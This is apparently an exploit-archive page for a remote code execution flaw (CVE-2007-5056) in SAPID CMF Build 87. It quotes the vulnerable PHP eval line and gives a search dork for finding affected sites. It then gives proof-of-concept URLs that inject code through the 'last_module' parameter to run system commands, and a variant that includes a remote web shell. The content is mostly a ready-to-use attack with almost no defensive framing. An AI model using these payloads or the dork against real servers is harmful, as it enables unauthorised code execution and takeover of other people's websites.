[] NeoSense
E X P L O I T S
title author type platform port cve id

SAPID CMF Build 87 - 'last_module' Remote Code Execution

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-02-09 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-40596;CVE-2007-5056 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsapidcmf.r84.zip
### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09:  */

eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)

# milw0rm.com [2008-02-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.